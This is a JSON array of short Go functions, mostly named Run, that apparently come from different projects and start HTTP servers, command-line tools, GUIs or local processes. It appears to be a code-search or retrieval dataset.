[ "func (app *App) Run() error {\n\treturn nil\n}", "func (app *Application) Run() error {\n\n\terr := app.expose()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (a *Application) Run() error {\n\t<-a.quit\n\treturn nil\n}", "func Run(version string, args []string) {\n\terr := NewApp(version, time.Now()).Run(args)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tos.Exit(1)\n\t}\n}", "func (app *Application) Run() {\n\tapp.Setup()\n\n\tapp.App.Listen(fmt.Sprintf(\"%s:%d\", app.Config.App.Host, app.Config.App.Port))\n}", "func (m *AppManager) Run() {\n\tlog.Info(\"Starting HO App Manager\")\n\tm.SB.Run()\n}", "func (a *App) Run() {\n\taddr := fmt.Sprintf(\":%d\", a.getPort())\n\n\ta.Logger.Info(\"starting application\", logging.DataFields{\"port\": addr})\n\terr := http.ListenAndServe(addr,a.router)\n\tif err != nil {\n\t\ta.Logger.Error(\"An error occurred starting the server. Going to call exit\", logging.DataFields{\"Error\": err.Error()})\n\t\tos.Exit(1)\n\t}\n}", "func Run() {\n\tApp.Init()\n\n\tif Config.String(\"address\") != \"\" {\n\t\tLog.Info(fmt.Sprintf(\"listening on %s\", Config.String(\"address\")))\n\t\tLog.Error(http.ListenAndServe(Config.String(\"address\"), App.Router))\n\t} else {\n\t\tLog.Info(fmt.Sprintf(\"listening on port :%d\", Config.Int(\"port\")))\n\t\tLog.Error(http.ListenAndServe(fmt.Sprintf(\":%d\", Config.Int(\"port\")), App.Router))\n\t}\n}", "func (app *Application) Run() {\n\terr := app.Server.ListenAndServe()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n}", "func (a *App) Run() error {\n\tdirs := generateDirectories(a.Config.Directories, a.Config.Depth)\n\tif a.Config.QuickMode {\n\t\treturn a.execQuickMode(dirs)\n\t}\n\t// create a gui.Gui struct and run the gui\n\tgui, err := gui.New(a.Config.Mode, dirs)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn gui.Run()\n}", "func (app *App) Run() {\n\tMust(app.Engine.Start(\":\" + app.Conf.UString(\"port\")))\n}", "func (app *App) Run() error {\n\tgo func() {\n\t\t<-app.Quit\n\t\tapp.app.Stop()\n\t}()\n\n\tui.SetConsoleTitle(\"RazTracer\")\n\n\treturn app.app.SetFocus(app).Run()\n}", "func Run() {\n\tappConfig := &OpenZwaveAppConfig{}\n\t// Load the appConfig from <AppID>.yaml from the default config folder (~/.config/iotdomain)\n\tpub, _ := publisher.NewAppPublisher(AppID, \"\", appConfig, \"\", true)\n\tNewOpenZwaveApp(appConfig, pub)\n\n\tpub.Start()\n\tpub.WaitForSignal()\n\tpub.Stop()\n}", "func (app *Application) Run() {\n\t// register middlewares\n\tapp.Middlewares()\n\n\t// register resources\n\tapp.Resources()\n\n\t// run server\n\tapp.Application.Run()\n}", "func (app *App) Run() (err error) {\n\treturn app.Renderer.Run()\n}", "func (a *App) Run() {\n\tport := os.Getenv(\"PORT\")\n\tif len(port) == 0 {\n\t\tport = \"3000\"\n\t}\n\n\ta.logger.Println(\"listening on port \" + port)\n\ta.logger.Fatalln(http.ListenAndServe(\":\"+port, a))\n}", "func (a *App) Run() {\n\tlog.Fatal(http.ListenAndServe(\":8000\", a.router))\n}", "func (a *App) Run() {\n\tport := os.Getenv(\"PORT\")\n\tif port == \"\" {\n\t\tport = \"5000\"\n\t}\n\n\ta.Router.Run(\":\" + port)\n\tfmt.Println(\"App ready for use\")\n}", "func (a *App) Run(ctx context.Context) error {\n\tif a.pass {\n\t\treturn nil\n\t}\n\t// TODO\n\treturn nil\n}", "func (app *App) Run() {\n\tif err := app.Start(Timeout(DefaultTimeout)); err != nil {\n\t\tapp.logger.Fatalf(\"ERROR\\t\\tFailed to start: %v\", err)\n\t}\n\n\tapp.logger.PrintSignal(<-app.Done())\n\n\tif err := app.Stop(Timeout(DefaultTimeout)); err != nil {\n\t\tapp.logger.Fatalf(\"ERROR\\t\\tFailed to stop cleanly: %v\", err)\n\t}\n}", "func (a *App) Run() {\n\tfmt.Println(\"Run\")\n\tdefer a.session.Close()\n\ta.server.Start()\n}", "func Run(conf *config.Config) {\n\n\tvar eventHandler = ParseEventHandler(conf)\n\tcontroller.Start(conf, eventHandler)\n}", "func (m *Manager) Run() {\n\tlog.Info(\"Starting Manager\")\n\tif err := m.Start(); err != nil {\n\t\tlog.Fatal(\"Unable to run Manager\", err)\n\t}\n}", "func (a *App) Run(addr string) {\n\tlog.Printf(\"Started App on %s\\n\", addr)\n\tlog.Fatal(http.ListenAndServe(addr, a.Router))\n}", "func (a *App) Run(addr string) {\n\tlog.Fatal(http.ListenAndServe(\":8010\", a.Engine))\n}", "func (w *web) Run() {\n\tw.ready()\n\n\taddr := fmt.Sprintf(\"%s:%s\", w.Host, w.Port)\n\tLogger.Info(\"Starting web server at: %s\", addr)\n\tw.instance.Run(standard.New(addr))\n}", "func Run(osArgs []string) error {\n\terrRun := app.Run(osArgs)\n\tif errRun != nil {\n\t\treturn errRun\n\t}\n\treturn nil\n}", "func (s *Server) Run(log *logrus.Entry) error {\n\ts.log = log.WithField(\"app\", AppName)\n\n\t// Init the app\n\ts.InitStart(log)\n\n\ts.gracefulServer = s.httpServer(s.log)\n\terr := s.gracefulServer.ListenAndServe()\n\tif err != nil && err != http.ErrServerClosed {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (g *App) Run(args []string) error {\n\tif g.root == nil {\n\t\tpanic(\"need Bind or use NewWith\")\n\t}\n\n\t_, _, err := g.exec(args, true)\n\treturn err\n}", "func (a *app) Run() App {\n\ta.logDebugInfo(\"Run\")\n\tif a.logger == nil {\n\t\tfmt.Println(\"No Logger provided! - ending app\")\n\t\treturn a\n\t}\n\tif a.router == nil {\n\t\ta.logger.LogError(\"No Router provided!\")\n\t\treturn a\n\t}\n\ta.logger.LogInfo(\"Starting NSP app.\")\n\ta.serve()\n\ta.logger.LogInfo(\"Closing NSP app.\")\n\treturn a\n}", "func Run(appStart func() error) {\n\tlchr.run(appStart)\n}", "func (app *App) Run() {\n\terr := app.database.DB().Ping()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tlog.Printf(\"Server version %s running on %s\\n\", app.Version, app.server.Addr)\n\tif err := app.server.ListenAndServe(); err != nil {\n\t\tlog.Println(err)\n\t}\n}", "func Run(ctx *cli.Context) {\n\tport = ctx.Int(\"port\")\n\n\tif len(ctx.Args()) == 1 {\n\t\tcwd = ctx.Args()[0]\n\t}\n\tif abspath, err := filepath.Abs(cwd); err == nil {\n\t\tenv.Set(internal.BaseDir, abspath)\n\t} else {\n\t\tlog.Fatalf(\"Failed to retrieve the directory: %v\", err)\n\t}\n\n\tpkg, err := build.ImportDir(cwd, build.AllowBinary)\n\tif err != nil || pkg.Name != \"main\" {\n\t\tlog.Fatalf(\"No buildable Go source files found\")\n\t}\n\tapp := new(app)\n\tapp.dir = cwd\n\tapp.binary = filepath.Join(os.TempDir(), \"rex-bin\")\n\tif runtime.GOOS == \"windows\" {\n\t\tapp.binary += \".exe\"\n\t}\n\tapp.task = ctx.String(\"task\")\n\tapp.Start()\n}", "func (m *Manager) Run() {\n\tgo func() {\n\t\tif err := m.Start(context.Background()); err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t}()\n}", "func (r *Runner) Run(application *config.Application) {\n\n\tif debugMode {\n\n\t\tif err := r.checkApplicationExecutableEnvironment(application); err != nil {\n\t\t\tr.view.Writef(\"❌ %s\\n\", err.Error())\n\t\t\treturn\n\t\t}\n\n\t\tr.view.Writef(\"⚙️ Running local app '%s' (%s)...\\n\", application.Name, application.Path)\n\n\t\tapplicationPath := application.GetPath()\n\n\t\tstdoutStream := NewLogstreamer(StdOut, application.Name, r.view)\n\t\tstderrStream := NewLogstreamer(StdErr, application.Name, r.view)\n\n\t\tcmd := exec.Command(application.Executable, application.Args...)\n\t\tcmd.SysProcAttr = &syscall.SysProcAttr{Setpgid: false}\n\t\tcmd.Dir = applicationPath\n\t\tcmd.Stdout = stdoutStream\n\t\tcmd.Stderr = stderrStream\n\t\tcmd.Stdin = os.Stdin\n\n\t\tcmd.Env = os.Environ()\n\n\t\t// Add environment variables\n\t\tfor key, value := range application.Env {\n\t\t\tcmd.Env = append(cmd.Env, fmt.Sprintf(\"%s=%s\", key, value))\n\t\t}\n\n\t\tr.cmds[application.Name] = cmd\n\n\t\tif err := cmd.Run(); err != nil {\n\t\t\tr.view.Writef(\"❌ Cannot run the following application: %s: %v\\n\", applicationPath, err)\n\t\t\treturn\n\t\t}\n\t\tcmd.Stdin = os.Stdin\n\t}else {\n\n\t\tcmd := exec.Command(application.Executable, application.Args...)\n\n\t\tcmd.Dir = application.GetPath()\n\n\t\tvar errStdout, errStderr error\n\t\tstdoutIn, _ := cmd.StdoutPipe()\n\t\tstderrIn, _ := cmd.StderrPipe()\n\t\tstdout := NewinteractiveWriter(os.Stdout)\n\t\tstderr := NewinteractiveWriter(os.Stderr)\n\t\t//cmd.SysProcAttr = &syscall.SysProcAttr{Setpgid: true}\n\t\tcmd.Stdin = os.Stdin\n\t\terr := cmd.Start()\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Unable to run command: %s\", err)\n\t\t}\n\n\t\tvar wg sync.WaitGroup\n\t\twg.Add(1)\n\n\t\tgo func() {\n\t\t\t_, errStdout = io.Copy(stdout, stdoutIn)\n\t\t\twg.Done()\n\t\t}()\n\n\t\t_, errStderr = io.Copy(stderr, stderrIn)\n\t\twg.Wait()\n\n\t\terr = cmd.Wait()\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Unable to run command\")\n\t\t}\n\t\tif errStdout != nil || errStderr != nil {\n\t\t\tlog.Fatalf(\"internal failure with std pipe\")\n\t\t}\n\t}\n\t\n}", "func (app *App) Run() {\r\n\tlog.Print(\"Listening...\")\r\n\tlog.Fatal(http.ListenAndServe(\":8080\", app.Router))\r\n}", "func (a *App) Run(addr string) {\n\tfmt.Printf(\"Server listening on port %s\\n\", strings.Trim(addr, \":\"))\n\tlog.Fatal(http.ListenAndServe(addr, a.Router))\n}", "func (a *Application) Run() {\n\tlog.Infof(\"Start to listening the incoming requests on http address: %s\", viper.GetString(\"app.addr\"))\n\tsrv := &http.Server{\n\t\tAddr: viper.GetString(\"app.addr\"),\n\t\tHandler: a.Router,\n\t}\n\tgo func() {\n\t\t// service connections\n\t\tif err := srv.ListenAndServe(); err != nil && err != http.ErrServerClosed {\n\t\t\tlog.Fatalf(\"listen: %s\", err.Error())\n\t\t}\n\t}()\n\n\tgracefulStop(srv)\n}", "func (a *App) Run(addr string) {\n\ta.Logger.WithFields(logrus.Fields{\"addr\": addr}).Info(\"starting http server\")\n\ta.Logger.Fatal(http.ListenAndServe(addr, a.Router))\n}", "func main() {\n\tapp.StartApp()\n}", "func run() {\n\tlog.Info(\"Maison is starting...\")\n\n\tbus.Init()\n\n\t// TODO: init stores\n\n\tinitPlugins()\n\n\tlog.Info(\"Maison is started\")\n}", "func (a *App) Run(addr string) {\n\tlog.Fatal(http.ListenAndServe(addr, a.Router))\n}", "func (a *App) Run(addr string) {\n\tlog.Fatal(http.ListenAndServe(addr, a.Router))\n}", "func (a *App) Run(addr string) {\n\tlog.Fatal(http.ListenAndServe(addr, a.Router))\n}", "func (a *App) Run(addr string) {\n\tlog.Fatal(http.ListenAndServe(addr, a.Router))\n}", "func (a *App) Run(addr string) {\n\tlog.Fatal(http.ListenAndServe(addr, a.Router))\n}", "func (a *App) Run(host string) {\n\tlog.Fatal(http.ListenAndServe(host, a.Router))\n}", "func (a *App) Run(host string) {\n\tlog.Fatal(http.ListenAndServe(host, a.Router))\n}", "func (a App) Run() error {\n\tdeal, err := FetchDeal(a.URL)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Could not fetch deal: %v\", err)\n\t}\n\n\tNewPrinter(a.Out).Print(deal)\n\treturn nil\n}", "func (app *App) Run() {\n\tlog.Fatal(http.ListenAndServe(\":8080\", app.Router))\n}", "func (f *Floki) Run() {\n\tlogger := f.logger\n\n\tif Env == Prod {\n\t\truntime.GOMAXPROCS(runtime.NumCPU())\n\t}\n\n\ttplDir := f.GetParameter(\"views dir\").(string)\n\tf.SetParameter(\"templates\", compileTemplates(tplDir, logger))\n\n\tport := os.Getenv(\"PORT\")\n\tif port == \"\" {\n\t\tport = \"3000\"\n\t}\n\n\thost := os.Getenv(\"HOST\")\n\t_ = host\n\n\taddr := host + \":\" + port\n\tlogger.Printf(\"listening on %s (%s)\\n\", addr, Env)\n\n\tif err := http.ListenAndServe(addr, f); err != nil {\n\t\tpanic(err)\n\t}\n}", "func Run(app Application) error {\n\tcfg := app.Config()\n\n\tconn, err := comm.NewgRPCClient(cfg.MasterAddress)\n\tif err != nil {\n\t\treturn err\n\t}\n\tappCli := types.NewApplicationClient(conn)\n\n\tctx, cancel := context.WithTimeout(context.Background(), time.Second)\n\tdefer cancel()\n\n\tif _, err := appCli.Ping(ctx, &types.Empty{}); err != nil {\n\t\treturn err\n\t}\n\n\tstream, err := appCli.Stream(context.Background())\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor {\n\t\tstream.Recv()\n\n\t}\n\n\treturn nil\n}", "func (a *App) Run(addr string) {\n\ta.Logger.Fatal(http.ListenAndServe(addr, a.Router))\n}", "func (c *AppsInitCmd) Run() (err error) {\n\tvar stdout bytes.Buffer\n\tvar stderr bytes.Buffer\n\tswitch c.StackName {\n\tcase \"nodejs-basic\":\n\t\terr := c.InitializeNodeBasicApp(stdout, stderr)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"[ERROR]: init completed with error %x\", err)\n\t\t}\n\tdefault:\n\t\tlog.Printf(\"[ERROR]: Stack name %s does not have an initialization defined\\n\", c.StackName)\n\t}\n\treturn err\n}", "func (g *Getter) Run(args []string) {\n\tif len(args) != 1 {\n\t\tfmt.Fprintln(os.Stderr, \"Missing \\\"package\\\" argument to define the application to get\")\n\t\tos.Exit(1)\n\t}\n\n\terr := get(args[0], g.icon)\n\tif err != nil {\n\t\tfmt.Fprintf(os.Stderr, \"%s\\n\", err.Error())\n\t\tos.Exit(1)\n\t}\n}", "func (s *Service) Run() {\n\tgrip.CatchAlert(s.App().Run())\n}", "func (a *App) Run() {\n\tif a.cmd != nil {\n\t\ta.cmd.Run(a.container)\n\t}\n\n\twg := sync.WaitGroup{}\n\n\t// Start HTTP Server\n\tif a.httpServer != nil {\n\t\twg.Add(1)\n\n\t\tgo func(s *httpServer) {\n\t\t\tdefer wg.Done()\n\t\t\ts.Run(a.container)\n\t\t}(a.httpServer)\n\t}\n\n\twg.Wait()\n}", "func main() {\n\terr := app.Execute()\n\tif err != nil {\n\t\tlog.WithError(err).Error(\"Error while Execute lookatch\")\n\t}\n}", "func (ui *ReplApp) Run() {\n\tctx, cancel := context.WithCancel(context.Background())\n\tdefer cancel() // stops engine\n\n\t// start chat engine\n\tui.engine.Start(ctx)\n\t// start repl console\n\tui.console.Run(ctx)\n\n\tui.loop() // blocks until \"quit\"\n}", "func (c *AppsInitCmd) Run() (err error) {\n\tvar stdout bytes.Buffer\n\tvar stderr bytes.Buffer\n\tswitch c.StackName {\n\tcase \"nodejs-basic\":\n\t\terr := c.InitializeNodeBasicApp(stdout, stderr)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"[ERROR]: init completed with error %x\", err)\n\t\t}\n\tdefault:\n\t\tlog.Error().Msg(fmt.Sprintf(\": Stack name %s does not have an initialization defined\\n\", c.StackName))\n\t}\n\treturn err\n}", "func (a *App) Run(port string) {\n\thttp.Handle(\"/\", a.Router)\n\n\tlog.Printf(\"Listening on %s\", port)\n\n\tlog.Fatal(http.ListenAndServe(fmt.Sprintf(\":%s\", port), nil))\n}", "func (api *API) Run() error {\n\treturn api.startServe()\n}", "func Run(args []string) (err error) {\n\tcli.VersionFlag = &cli.BoolFlag{\n\t\tName: \"version\",\n\t\tAliases: []string{\"v\"},\n\t\tUsage: \"Shows current cli version\",\n\t}\n\n\tapp.EnableBashCompletion = true\n\terr = app.Run(args)\n\treturn\n}", "func (a *Application) Run() {\n\tstartCtx, cancel := context.WithTimeout(context.Background(), a.lifecycleTimeout)\n\tdefer cancel()\n\n\tdone, err := a.Start(startCtx)\n\tif err != nil {\n\t\ta.errorHandler.Handle(err)\n\t\treturn\n\t}\n\n\tr := <-done\n\n\t// The application stopped because of an error\n\tif err, ok := r.(error); ok || err != nil {\n\t\ta.errorHandler.Handle(err)\n\t} else if sig, ok := r.(os.Signal); ok { // The application stopped because of an os signal\n\t\tlevel.Info(a.logger).Log(\"msg\", fmt.Sprintf(\"captured %v signal\", sig))\n\t}\n\n\tshutdownCtx, cancel := context.WithTimeout(context.Background(), a.lifecycleTimeout)\n\tdefer cancel()\n\n\tif err := a.Shutdown(shutdownCtx); err != nil {\n\t\ta.errorHandler.Handle(err)\n\t}\n}", "func Run() error {\n\tgo server.ListenAndServe()\n\t// TODO: Improve error handling\n\treturn nil\n}", "func (s *Starter) Run() error {\n\t// Step-1: rake config\n\t// Step-2: clone|use-local template\n\t// Step-3: ask-flow\n\t// Step-4: generate project\n\n\treturn nil\n}", "func (a *API) Run() error {\n\treturn a.e.Start(a.addr)\n}", "func (app *App) Run(addr string) {\n\n\tlog.Fatal(http.ListenAndServe(addr, app.Router))\n}", "func (p Helium) Run() error {\n\treturn p.di.Invoke(func(ctx context.Context, app App) error {\n\t\treturn app.Run(ctx)\n\t})\n}", "func (a *App) Run(port string) {\n\tlog.Fatal(http.ListenAndServe(fmt.Sprintf(\":%s\", port), a.Router))\n}", "func Run() {\n\tsrc.ReadConfig(\"config.json\")\n\terr := src.InitDatabase(\"./\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\terr = src.ReminderInit(\"./\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tsrc.Start()\n\n\t<-make(chan struct{})\n\tdefer src.RemindClient.Close()\n\tdefer src.DB.Client.Close()\n}", "func Run() {\n\tgetRoutes()\n\trouter.Run(\":5000\")\n}", "func (app *Application) Run() error {\n\n\tr := gin.Default()\n\tr.LoadHTMLGlob(\"templates/*\")\n\n\t// inject Config into context\n\n\tr.Use(func(c *gin.Context) {\n\t\tc.Set(\"cfg\", app.Config)\n\t\tc.Next()\n\t})\n\n\t// CSRF\n\tr.Use(wraphh.WrapHH(nosurf.NewPure))\n\n\tr.Static(app.Options.StaticURL, app.Options.StaticDir)\n\n\tr.GET(\"/\", indexPage)\n\n\tapi := r.Group(\"/api\")\n\n\tapi.GET(\"/all/\", getMovies)\n\tapi.GET(\"/\", getRandomMovie)\n\tapi.POST(\"/\", addMovie)\n\tapi.GET(\"/suggest\", suggest)\n\tapi.GET(\"/movie/:id\", getMovie)\n\tapi.DELETE(\"/movie/:id\", deleteMovie)\n\tapi.PATCH(\"/seen/:id\", markSeen)\n\n\tr.Run()\n\treturn nil\n}", "func (app *App) Run(address string) {\n\tif app.Server() != nil {\n\t\tapp.Server().Addr = address\n\t}\n\n\tquit := make(chan os.Signal)\n\tsignal.Notify(quit, os.Interrupt)\n\n\tgo func() {\n\t\t<-quit\n\t\tif err := app.Stop(); err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer close(quit)\n\t}()\n\n\tif err := app.Start(); err != nil {\n\t\tpanic(err)\n\t}\n}", "func (a *App) Run() error {\n\treturn http.Serve(a.Listener, a.Router)\n}", "func (api *API) Run() {\n\tr := gin.Default()\n\n\tapi.configRoutes(r)\n\n\tr.Run() // listen and serve on 0.0.0.0:8080 (for windows \"localhost:8080\")\n}", "func (s *Scheduler) Run(app twelvefactor.App, processes ...twelvefactor.Process) error {\n\treturn s.stackBuilder.Build(app, processes...)\n}", "func (a *App) Run(cmd string, w io.Writer) error {\n\ta.Log(fmt.Sprintf(\"running '%s'\", cmd), \"tsuru\")\n\tsource := \"[ -f /home/application/apprc ] && source /home/application/apprc\"\n\tcd := \"[ -d /home/application/current ] && cd /home/application/current\"\n\tcmd = fmt.Sprintf(\"%s; %s; %s\", source, cd, cmd)\n\treturn a.run(cmd, w)\n}", "func RunApp() {\n\tapp := createApp()\n\tapp.Run()\n}", "func (a *App) Run() {\n\trand.Seed(time.Now().UTC().UnixNano())\n\n\tinitFlag()\n\n\tcmd := cobra.Command{\n\t\tUse: FormatBaseName(a.basename),\n\t\tLong: a.description,\n\t\tSilenceUsage: true,\n\t\tSilenceErrors: true,\n\t}\n\tcmd.SetUsageTemplate(usageTemplate)\n\tcmd.Flags().SortFlags = false\n\tif len(a.commands) > 0 {\n\t\tfor _, command := range a.commands {\n\t\t\tcmd.AddCommand(command.cobraCommand())\n\t\t}\n\t\tcmd.SetHelpCommand(helpCommand(a.name))\n\t}\n\tif a.runFunc != nil {\n\t\tcmd.Run = a.runCommand\n\t}\n\n\tcmd.Flags().AddGoFlagSet(flag.CommandLine)\n\tif a.options != nil {\n\t\tif _, ok := a.options.(ConfigurableOptions); ok {\n\t\t\taddConfigFlag(a.basename, cmd.Flags())\n\t\t}\n\t\ta.options.AddFlags(cmd.Flags())\n\t}\n\n\tif !a.noVersion {\n\t\tversion.AddFlags(cmd.Flags())\n\t}\n\taddHelpFlag(a.name, cmd.Flags())\n\n\tif err := cmd.Execute(); err != nil {\n\t\tfmt.Printf(\"%v %v\\n\", color.RedString(\"Error:\"), err)\n\t\tos.Exit(1)\n\t}\n}", "func (a *App) Run(httpPort string) {\n\n\tlog.Printf(\"Server running on port %s\\n\", httpPort)\n\n\t// Setup server\n\tserver := &http.Server{\n\t\tHandler: a.Router,\n\t\tAddr: \":\" + httpPort,\n\t\tWriteTimeout: 15 * time.Second,\n\t\tReadTimeout: 15 * time.Second,\n\t}\n\tlog.Fatal(server.ListenAndServe())\n}", "func Run() {\n\tflag.Parse()\n\n\t// Open or create file at ~/applications.json\n\tfile := openFile()\n\n\t// If file is empty write initial JSON to it\n\tfi, _ := file.Stat()\n\tif fi.Size() == 0 {\n\t\t_, err := file.WriteString(\"{}\")\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\t// Reopen it to get updates\n\t\tfile = openFile()\n\t}\n\n\t// Read file and parse into applications struct\n\topts := readFile(file)\n\tapps := make(applications)\n\terr := json.Unmarshal(opts, &apps)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Handle reading and setting configuration if -s flag passed\n\tif *set {\n\t\tsetConfig(opts, apps)\n\t\treturn\n\t}\n\n\t// Loop through applications and either open or close them\n\tfor _, app := range apps[*group] {\n\t\twg.Add(1)\n\t\tgo func(app string) {\n\t\t\tdefer wg.Done()\n\n\t\t\tif *close {\n\t\t\t\terr = closeApp(app)\n\t\t\t} else {\n\t\t\t\terr = openApp(app, apps)\n\t\t\t}\n\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(err)\n\t\t\t}\n\t\t}(app)\n\t}\n\n\twg.Wait()\n}", "func main() {\n\tapplication.Application()\n}", "func Run() error {\n\tvar err error\n\n\ts := NewServer()\n\tport := \":1729\"\n\tfmt.Printf(\"Listening on %s...\\n\", port)\n\thttp.ListenAndServe(port, s)\n\n\treturn err\n}", "func (a *App) Run(addr string) {\n\tfmt.Println(\"*** Starting the web server...\")\n\n\tn := negroni.New(\n\t\tnegroni.NewRecovery(),\n\t\tnegroni.HandlerFunc(handlers.LoggingHandler),\n\t\t//negroni.HandlerFunc(c),\n\t)\n\n\t//cross origin resource control\n\tc := resAccessControl()\n\tn.Use(c)\n\n\t//n.Use(negroni.HandlerFunc(handlers.LoggingHandler))\n\tn.UseHandler(a.Router)\n\t//log.Fatal(http.ListenAndServe(addr, &a.Router))\n\tn.Run(addr)\n}", "func (app *App) Run(host string) {\n\tlog.Fatal(http.ListenAndServe(host, app.Router))\n}", "func Run() {\n\tdefaultDaemon.Run()\n}", "func Run() error {\n\tcfg := config.Load()\n\n\tapp := &cli.App{\n\t\tName: \"prometheus-hcloud-sd\",\n\t\tVersion: version.String,\n\t\tUsage: \"Prometheus HetznerCloud SD\",\n\t\tAuthors: []*cli.Author{\n\t\t\t{\n\t\t\t\tName: \"Thomas Boerger\",\n\t\t\t\tEmail: \"[email protected]\",\n\t\t\t},\n\t\t},\n\t\tFlags: RootFlags(cfg),\n\t\tCommands: []*cli.Command{\n\t\t\tHealth(cfg),\n\t\t\tServer(cfg),\n\t\t},\n\t}\n\n\tcli.HelpFlag = &cli.BoolFlag{\n\t\tName: \"help\",\n\t\tAliases: []string{\"h\"},\n\t\tUsage: \"Show the help, so what you see now\",\n\t}\n\n\tcli.VersionFlag = &cli.BoolFlag{\n\t\tName: \"version\",\n\t\tAliases: []string{\"v\"},\n\t\tUsage: \"Print the current version of that tool\",\n\t}\n\n\treturn app.Run(os.Args)\n}", "func Main() error {\n\tapp, err := New(context.Background())\n\tif err != nil {\n\t\treturn skerr.Wrap(err)\n\t}\n\n\treturn app.Run()\n}", "func (app *App) Run() {\n\tthings, err := app.store.ThingsGetAll()\n\tif err != nil {\n\t\tlog.WithError(err).Errorf(\"failed to get all things from database: %s\", err.Error())\n\t}\n\tlog.Infof(\"find all things in database: %+v\", things)\n}", "func Run() {\n\tcmd := registry.Root()\n\tif err := cmd.Execute(); err != nil {\n\t\tkouch.Exit(err)\n\t}\n}", "func (tui *TUI) Run() error {\n\treturn tui.app.SetRoot(tui.window, true).Run()\n}", "func (c *AppsCreateCmd) Run(logWriters *LogWriters) (err error) {\t\n\ts := NewSpinner(fmt.Sprintf(\"Creating new app %s\", c.Hostname),logWriters)\n\ts.Start()\n\n\tapi.Timeout = 120 * time.Second // this specific request can take a long time\n\tr, err := api.ApplicationCreate(c.AccountID, c.Hostname, c.Origin, c.StackName)\n\ts.Stop()\n\tfmt.Println()\n\tif err != nil {\n\t\tif err == api.ErrStatusForbidden {\n\t\t\tstacks, herr := api.Stacks()\n\t\t\tif herr != nil {\n\t\t\t\treturn fmt.Errorf(\"unable to query stacks: %w\", herr)\n\t\t\t}\n\t\t\tfor _, s := range stacks {\n\t\t\t\tif s.Name == c.StackName {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn fmt.Errorf(\"bad request: unable to find stack %s\", c.StackName)\n\t\t}\n\t\treturn err\n\t}\n\n\tlog.Info().Msg(fmt.Sprintf(\"\\nSuccess: created app '%s' with id '%d'\\n\", r.ApplicationName, r.ID))\n\n\treturn err\n}", "func Run() {\n\trun()\n}", "func Run() {\n\t// Seed RNG\n\trand.Seed(time.Now().UnixNano())\n\n\t// Set up the game window\n\tebiten.SetWindowSize(640, 480)\n\tebiten.SetWindowTitle(\"Soup The Moon\")\n\n\tif util.IsRasPi() {\n\t\t// Set fullscreen\n\t\tebiten.SetFullscreen(true)\n\n\t\t// Hide cursor\n\t\tebiten.SetCursorMode(ebiten.CursorModeHidden)\n\n\t\t// Setup RPIO button input\n\t\tinput.InitPluto()\n\t\tinput.InitSaturn()\n\t\tinput.InitJupiter()\n\t\tinput.InitMars()\n\t\tinput.InitEarth()\n\t\tinput.InitMercury()\n\t\tinput.InitUp()\n\t\tinput.InitDown()\n\t\tinput.InitEnter()\n\t\tinput.InitBack()\n\t}\n\n\t// Run game\n\tif err := ebiten.RunGame(newGame(640, 480)); err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func Run(ctx context.Context, app dogma.Application, options ...EngineOption) error {\n\treturn New(app, options...).Run(ctx)\n}", "func (a *App) Run(arguments []string) {\n\ta.initialize()\n\n\t// parse cli arguments\n\tcl := &commandline{\n\t\tflags: a.Flags,\n\t\tcommands: a.Commands,\n\t}\n\terr := cl.parse(arguments[1:])\n\n\t// build context\n\tnewCtx := &Context{\n\t\tname: a.Name,\n\t\tapp: a,\n\t\tflags: a.Flags,\n\t\tcommands: a.Commands,\n\t\targs: cl.args,\n\t}\n\n\tif err != nil {\n\t\tnewCtx.ShowError(err)\n\t}\n\n\t// show --help\n\tif newCtx.GetBool(\"help\") {\n\t\tnewCtx.ShowHelpAndExit(0)\n\t}\n\t// show --version\n\tif newCtx.GetBool(\"version\") {\n\t\ta.ShowVersion(a)\n\t\tos.Exit(0)\n\t}\n\n\t// command not found\n\tif cl.command == nil && len(a.Commands) > 0 && len(cl.args) > 0 {\n\t\tcmd := cl.args[0]\n\t\tif a.OnCommandNotFound != nil {\n\t\t\ta.OnCommandNotFound(newCtx, cmd)\n\t\t} else {\n\t\t\tnewCtx.ShowError(fmt.Errorf(\"no such command: %s\", cmd))\n\t\t}\n\t\treturn\n\t}\n\n\t// run command\n\tif cl.command != nil {\n\t\tcl.command.Run(newCtx)\n\t\treturn\n\t}\n\n\tif a.Action != nil {\n\t\tdefer newCtx.handlePanic()\n\t\ta.Action(newCtx)\n\t} else {\n\t\tnewCtx.ShowHelpAndExit(0)\n\t}\n}", "func main() {\n\ta := App{}\n\ta.Initialize()\n\ta.Run(\":8000\")\n}", "func (a *App) Run() error {\n\t// Run state updater\n\tctx, cancel := context.WithCancel(context.Background())\n\tgo a.updater.Run(ctx)\n\ta.cancelStateUpdate = cancel\n\n\t// run gui\n\treturn a.gui.Run()\n}", "func (h Helium) Run() error {\n\treturn h.di.Invoke(func(ctx context.Context, app App) error {\n\t\treturn app.Run(ctx)\n\t})\n}" ]
